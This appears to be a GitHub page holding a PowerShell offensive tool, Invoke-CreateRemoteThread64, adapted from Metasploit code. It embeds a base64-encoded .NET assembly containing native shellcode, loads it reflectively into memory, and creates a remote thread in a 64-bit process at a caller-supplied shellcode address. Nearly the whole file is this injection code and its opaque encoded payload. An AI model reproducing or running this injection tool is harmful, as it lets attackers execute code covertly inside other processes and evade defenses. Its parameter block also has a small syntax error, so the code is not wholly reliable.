-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathInvoke-CreateRemoteThread64.ps1
More file actions
50 lines (39 loc) · 11.6 KB
/
Invoke-CreateRemoteThread64.ps1
File metadata and controls
50 lines (39 loc) · 11.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
function Invoke-CreateRemoteThread64
{
<#
.SYNOPSIS
This function will create a remote thread in a 64 bit process, from a WOW64 process
Heavily based on code by Stephen Fewer from the metasploit project
https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter/source/common/arch/win/i386
.PARAMETER ProcessHandle
Uint32 handle to the remote process where the thread will be created
.PARAMETER ThreadStartRoutine
Uint32 pointer to the remote memory where you have copied shellcode, or address of remote
thread entrypoint
.PARAMETER ThreadParameter
Uint32 the parameter to pass to the new thread
.NOTES
Version: 1.0
Author: TomW (Coder666)
.EXAMPLE
Invoke-CreateRemoteThread64 -ProcessHandle $hProcess -ThreadStartRoutine $pShellcode
Invoke-CreateRemoteThread64 -ProcessHandle $hProcess -ThreadStartRoutine $pShellcode -Parameter 123
#>
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$true)]
[UInt32] $ProcessHandle,
[Parameter(Mandatory=$true)]
[UInt32] $ThreadStartRoutine
[Parameter(Mandatory=$false)]
[UInt32] $Parameter=0
)
Begin
{
$assembly = "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d0ZyZWVUeXBlAGhIYW5kbGUAZHdNaWxsaXNlY29uZHMAbHBUaHJlYWRBdHRyaWJ1dGVzAGR3U3RhY2tTaXplAGR3Q3JlYXRpb25GbGFncwBscFRocmVhZElkAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBPdXRBdHRyaWJ1dGUATWFyc2hhbEFzQXR0cmlidXRlAFVubWFuYWdlZFR5cGUASW5BdHRyaWJ1dGUAd293NjRQcm9jZXNzAFN5c3RlbS5SZWZsZWN0aW9uAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb21wYW55QXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUN1bHR1cmVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEFzc2VtYmx5VmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAFN5c3RlbS5EaWFnbm9zdGljcwBEZWJ1Z2dhYmxlQXR0cmlidXRlAERlYnVnZ2luZ01vZGVzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBDcmVhdGVUaHJlYWQ2NABEbGxJbXBvcnRBdHRyaWJ1dGUAa2VybmVsMzIuZGxsAEtlcm5lbDMyLmRsbABFbnZpcm9ubWVudABPcGVyYXRpbmdTeXN0ZW0AZ2V0X09TVmVyc2lvbgBWZXJzaW9uAGdldF9WZXJzaW9uAGdldF9NYWpvcgBnZXRfTWlub3IAUHJvY2VzcwBHZXRDdXJyZW50UHJvY2VzcwBnZXRfSGFuZGxlAElEaXNwb3NhYmxlAERpc3Bvc2UASW50UHRyAFplcm8AZ2V0X1NpemUAQnl0ZQA8UHJpdmF0ZUltcGxlbWVu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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
$assembly = [Convert]::FromBase64String($assembly)
[Reflection.Assembly]::Load($assembly)
[Thread.Util]::CreateRemoteThread64( $ProcessHandle, $ThreadStartRoutine, $Parameter);
}
}